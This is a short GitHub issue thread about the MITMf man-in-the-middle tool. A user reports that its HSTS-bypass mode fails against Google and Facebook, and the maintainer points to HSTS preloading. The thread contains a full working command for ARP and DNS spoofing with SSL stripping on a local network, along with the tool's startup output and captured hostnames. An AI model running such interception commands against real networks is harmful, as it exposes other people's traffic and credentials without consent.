### ISSUE TITLE
hsts problem

### ISSUE THREAD

**Issue by crush3dices** [byt3bl33d3r/MITMf#393]
First of all i followed the steps exactly like in the instructions. My OS is 4.9.0-kali3-amd64. My victims os is win7 SP1 using firefox v53.0 (32bit) and internet explorer (same result). Cache cleared on both browsers.

The problem is that sites like facebook or google simply use https as always and the traffic that is redirected to my machine is encrypted which i saw in wireshark and mitmf doesnt even show it.
On some sites the script succesfully deactivates https and changes it to http and then mitmf is showing everything just fine. Also if i contact any site that is naturally http it gets captured.
Furthermore on some sites the browser wont finish loading or the stylesheet gets lost.

command:

> python mitmf.py -i wlan0 --spoof --arp --hsts --dns --gateway 192.168.0.1

output:

> [*] MITMf v0.9.8 - 'The Dark Side'
> |
> |_ Net-Creds v1.0 online
> |_ SSLstrip+ v0.4
> |  |_ SSLstrip+ by Leonardo Nve running
> |_ Spoof v0.6
> |  |_ DNS spoofing enabled
> |  |_ ARP spoofing enabled
> |_ Sergio-Proxy v0.2.1 online
> |_ SSLstrip v0.9 by Moxie Marlinspike online
> |
> |_ MITMf-API online
>  * Running on http://127.0.0.1:9999/ (Press CTRL+C to quit)
> |_ HTTP server online
> |_ DNSChef v0.4 online
> |_ SMB server online
> 
> 2017-04-25 15:11:25 192.168.0.94 [type:Firefox-53 os:Windows 7] bing.de
> 2017-04-25 15:11:25 192.168.0.94 [type:Firefox-53 os:Windows 7] www.bing.com
> 2017-04-25 15:11:25 192.168.0.94 [type:Firefox-53 os:Windows 7] www.bing.com
> 2017-04-25 15:11:25 192.168.0.94 [type:Firefox-53 os:Windows 7] www.bing.com
> 2017-04-25 15:11:25 192.168.0.94 [type:Firefox-53 os:Windows 7] www.bing.com
> ...

Since i am just trying to learn how to modify/sniff/hijack traffic i might miss something here.
I hope you can help me anyway.

Thx

**Comment by byt3bl33d3r** [comment]
Google HSTS pre-loading. That should clear up eveything

**Comment by crush3dices** [comment]
Okay THX :)
